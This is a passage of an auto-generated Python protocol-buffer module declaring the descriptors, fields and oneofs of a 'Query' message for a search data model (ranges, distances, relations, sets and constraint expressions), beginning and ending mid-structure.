),
_descriptor.FieldDescriptor(
name="second",
full_name="aea.helpers.search.models.Query.LocationPair.second",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=898,
serialized_end=1029,
)
_QUERY_RANGE = _descriptor.Descriptor(
name="Range",
full_name="aea.helpers.search.models.Query.Range",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="string_pair",
full_name="aea.helpers.search.models.Query.Range.string_pair",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="integer_pair",
full_name="aea.helpers.search.models.Query.Range.integer_pair",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="double_pair",
full_name="aea.helpers.search.models.Query.Range.double_pair",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location_pair",
full_name="aea.helpers.search.models.Query.Range.location_pair",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="pair",
full_name="aea.helpers.search.models.Query.Range.pair",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=1032,
serialized_end=1321,
)
_QUERY_DISTANCE = _descriptor.Descriptor(
name="Distance",
full_name="aea.helpers.search.models.Query.Distance",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="center",
full_name="aea.helpers.search.models.Query.Distance.center",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="distance",
full_name="aea.helpers.search.models.Query.Distance.distance",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1323,
serialized_end=1410,
)
_QUERY_RELATION = _descriptor.Descriptor(
name="Relation",
full_name="aea.helpers.search.models.Query.Relation",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="operator",
full_name="aea.helpers.search.models.Query.Relation.operator",
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="aea.helpers.search.models.Query.Relation.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[_QUERY_RELATION_OPERATOR,],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1413,
serialized_end=1615,
)
_QUERY_SET_VALUES_INTS = _descriptor.Descriptor(
name="Ints",
full_name="aea.helpers.search.models.Query.Set.Values.Ints",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Ints.values",
index=0,
number=1,
type=3,
cpp_type=2,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2118,
serialized_end=2140,
)
_QUERY_SET_VALUES_DOUBLES = _descriptor.Descriptor(
name="Doubles",
full_name="aea.helpers.search.models.Query.Set.Values.Doubles",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Doubles.values",
index=0,
number=1,
type=1,
cpp_type=5,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2142,
serialized_end=2167,
)
_QUERY_SET_VALUES_STRINGS = _descriptor.Descriptor(
name="Strings",
full_name="aea.helpers.search.models.Query.Set.Values.Strings",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Strings.values",
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2169,
serialized_end=2194,
)
_QUERY_SET_VALUES_BOOLS = _descriptor.Descriptor(
name="Bools",
full_name="aea.helpers.search.models.Query.Set.Values.Bools",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Bools.values",
index=0,
number=1,
type=8,
cpp_type=7,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2196,
serialized_end=2219,
)
_QUERY_SET_VALUES_LOCATIONS = _descriptor.Descriptor(
name="Locations",
full_name="aea.helpers.search.models.Query.Set.Values.Locations",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.Locations.values",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2221,
serialized_end=2291,
)
_QUERY_SET_VALUES = _descriptor.Descriptor(
name="Values",
full_name="aea.helpers.search.models.Query.Set.Values",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="string",
full_name="aea.helpers.search.models.Query.Set.Values.string",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="double",
full_name="aea.helpers.search.models.Query.Set.Values.double",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="boolean",
full_name="aea.helpers.search.models.Query.Set.Values.boolean",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="integer",
full_name="aea.helpers.search.models.Query.Set.Values.integer",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location",
full_name="aea.helpers.search.models.Query.Set.Values.location",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_QUERY_SET_VALUES_INTS,
_QUERY_SET_VALUES_DOUBLES,
_QUERY_SET_VALUES_STRINGS,
_QUERY_SET_VALUES_BOOLS,
_QUERY_SET_VALUES_LOCATIONS,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.values",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=1752,
serialized_end=2301,
)
_QUERY_SET = _descriptor.Descriptor(
name="Set",
full_name="aea.helpers.search.models.Query.Set",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="operator",
full_name="aea.helpers.search.models.Query.Set.operator",
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.values",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_QUERY_SET_VALUES,],
enum_types=[_QUERY_SET_OPERATOR,],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1618,
serialized_end=2332,
)
_QUERY_CONSTRAINTEXPR_OR = _descriptor.Descriptor(
name="Or",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Or",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Or.expression",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2640,
serialized_end=2713,
)
_QUERY_CONSTRAINTEXPR_AND = _descriptor.Descriptor(
name="And",
full_name="aea.helpers.search.models.Query.ConstraintExpr.And",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.And.expression",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2715,
serialized_end=2789,
)
_QUERY_CONSTRAINTEXPR_NOT = _descriptor.Descriptor(
name="Not",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Not",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Not.expression",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2791,
serialized_end=2865,
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT = _descriptor.Descriptor(
name="Constraint",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="attribute_name",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.attribute_name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="set_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.set_",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="range_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.range_",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="relation",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.relation",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="distance",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.distance",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="constraint",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.constraint",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=2868,
serialized_end=3156,
)
_QUERY_CONSTRAINTEXPR = _descriptor.Descriptor(
name="ConstraintExpr",
full_name="aea.helpers.search.models.Query.ConstraintExpr",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="or_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.or_",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="and_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.and_",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="not_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.not_",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="constraint",
full_name="aea.helpers.search.models.Query.ConstraintExpr.constraint",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_QUERY_CONSTRAINTEXPR_OR,
_QUERY_CONSTRAINTEXPR_AND,
_QUERY_CONSTRAINTEXPR_NOT,
_QUERY_CONSTRAINTEXPR_CONSTRAINT,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.expression",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=2335,
serialized_end=3170,
)
_QUERY_MODEL = _descriptor.Descriptor(
name="Model",
full_name="aea.helpers.search.models.Query.Model",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="constraints",
full_name="aea.helpers.search.models.Query.Model.constraints",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model",
full_name="aea.helpers.search.models.Query.Model.model",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3173,
serialized_end=3309,
)
_QUERY = _descriptor.Descriptor(
name="Query",
full_name="aea.helpers.search.models.Query",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[],
extensions=[],
nested_types=[
_QUERY_ATTRIBUTE,
_QUERY_DATAMODEL,
_QUERY_LOCATION,
_QUERY_VALUE,
_QUERY_KEYVALUE,
_QUERY_INSTANCE,
_QUERY_STRINGPAIR,
_QUERY_INTPAIR,
_QUERY_DOUBLEPAIR,
_QUERY_LOCATIONPAIR,
_QUERY_RANGE,
_QUERY_DISTANCE,
_QUERY_RELATION,
_QUERY_SET,
_QUERY_CONSTRAINTEXPR,
_QUERY_MODEL,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=44,
serialized_end=3309,
)
_QUERY_ATTRIBUTE.fields_by_name["type"].enum_type = _QUERY_ATTRIBUTE_TYPE
_QUERY_ATTRIBUTE.containing_type = _QUERY
_QUERY_ATTRIBUTE_TYPE.containing_type = _QUERY_ATTRIBUTE
_QUERY_DATAMODEL.fields_by_name["attributes"].message_type = _QUERY_ATTRIBUTE
_QUERY_DATAMODEL.containing_type = _QUERY
_QUERY_LOCATION.containing_type = _QUERY
_QUERY_VALUE.fields_by_name["location"].message_type = _QUERY_LOCATION
_QUERY_VALUE.containing_type = _QUERY
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["string"]
)
_QUERY_VALUE.fields_by_name["string"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["double"]
)
_QUERY_VALUE.fields_by_name["double"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["boolean"]
)
_QUERY_VALUE.fields_by_name["boolean"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["integer"]
)
_QUERY_VALUE.fields_by_name["integer"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["location"]
)
_QUERY_VALUE.fields_by_name["location"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_KEYVALUE.fields_by_name["value"].message_type = _QUERY_VALUE
_QUERY_KEYVALUE.containing_type = _QUERY
_QUERY_INSTANCE.fields_by_name["model"].message_type = _QUERY_DATAMODEL
_QUERY_INSTANCE.fields_by_name["values"].message_type = _QUERY_KEYVALUE
_QUERY_INSTANCE.containing_type = _QUERY
_QUERY_STRINGPAIR.containing_type = _QUERY
_QUERY_INTPAIR.containing_type = _QUERY
_QUERY_DOUBLEPAIR.containing_type = _QUERY
_QUERY_LOCATIONPAIR.fields_by_name["first"].message_type = _QUERY_LOCATION
_QUERY_LOCATIONPAIR.fields_by_name["second"].message_type = _QUERY_LOCATION
_QUERY_LOCATIONPAIR.containing_type = _QUERY
_QUERY_RANGE.fields_by_name["string_pair"].message_type = _QUERY_STRINGPAIR
_QUERY_RANGE.fields_by_name["integer_pair"].message_type = _QUERY_INTPAIR
_QUERY_RANGE.fields_by_name["double_pair"].message_type = _QUERY_DOUBLEPAIR
_QUERY_RANGE.fields_by_name["location_pair"].message_type = _QUERY_LOCATIONPAIR
_QUERY_RANGE.containing_type = _QUERY
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["string_pair"]
)
_QUERY_RANGE.fields_by_name[
"string_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["integer_pair"]
)
_QUERY_RANGE.fields_by_name[
"integer_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["double_pair"]
)
_QUERY_RANGE.fields_by_name[
"double_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["location_pair"]
)
_QUERY_RANGE.fields_by_name[
"location_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_DISTANCE.fields_by_name["center"].message_type = _QUERY_LOCATION
_QUERY_DISTANCE.containing_type = _QUERY
_QUERY_RELATION.fields_by_name["operator"].enum_type = _QUERY_RELATION_OPERATOR
_QUERY_RELATION.fields_by_name["value"].message_type = _QUERY_VALUE
_QUERY_RELATION.containing_type = _QUERY
_QUERY_RELATION_OPERATOR.containing_type = _QUERY_RELATION
_QUERY_SET_VALUES_INTS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_DOUBLES.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_STRINGS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_BOOLS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_LOCATIONS.fields_by_name["values"].message_type = _QUERY_LOCATION
_QUERY_SET_VALUES_LOCATIONS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES.fields_by_name["string"].message_type = _QUERY_SET_VALUES_STRINGS
_QUERY_SET_VALUES.fields_by_name["double"].message_type = _QUERY_SET_VALUES_DOUBLES
_QUERY_SET_VALUES.fields_by_name["boolean"].message_type = _QUERY_SET_VALUES_BOOLS
_QUERY_SET_VALUES.fields_by_name["integer"].message_type = _QUERY_SET_VALUES_INTS
_QUERY_SET_VALUES.fields_by_name["location"].message_type = _QUERY_SET_VALUES_LOCATIONS
_QUERY_SET_VALUES.containing_type = _QUERY_SET
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["string"]
)
_QUERY_SET_VALUES.fields_by_name[
"string"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["double"]
)
_QUERY_SET_VALUES.fields_by_name[
"double"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["boolean"]
)
_QUERY_SET_VALUES.fields_by_name[
"boolean"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["integer"]
)
_QUERY_SET_VALUES.fields_by_name[
"integer"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["location"]
)
_QUERY_SET_VALUES.fields_by_name[
"location"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET.fields_by_name["operator"].enum_type = _QUERY_SET_OPERATOR
_QUERY_SET.fields_by_name["values"].message_type = _QUERY_SET_VALUES
_QUERY_SET.containing_type = _QUERY
_QUERY_SET_OPERATOR.containing_type = _QUERY_SET
_QUERY_CONSTRAINTEXPR_OR.fields_by_name[
"expression"
].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_OR.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_AND.fields_by_name[
"expression"
].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_AND.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_NOT.fields_by_name[
"expression"
].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_NOT.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["set_"].message_type = _QUERY_SET
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["range_"].message_type = _QUERY_RANGE
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"relation"
].message_type = _QUERY_RELATION
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"distance"
].message_type = _QUERY_DISTANCE
_QUERY_CONSTRAINTEXPR_CONSTRAINT.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["set_"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"set_"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["range_"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"range_"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["relation"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"relation"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["distance"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"distance"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR.fields_by_name["or_"].message_type = _QUERY_CONSTRAINTEXPR_OR
_QUERY_CONSTRAINTEXPR.fields_by_name["and_"].message_type = _QUERY_CONSTRAINTEXPR_AND
_QUERY_CONSTRAINTEXPR.fields_by_name["not_"].message_type = _QUERY_CONSTRAINTEXPR_NOT
_QUERY_CONSTRAINTEXPR.fields_by_name[
"constraint"
].message_type = _QUERY_CONSTRAINTEXPR_CONSTRAINT
_QUERY_CONSTRAINTEXPR.containing_type = _QUERY
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["or_"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"or_"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["and_"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"and_"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["not_"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"not_"
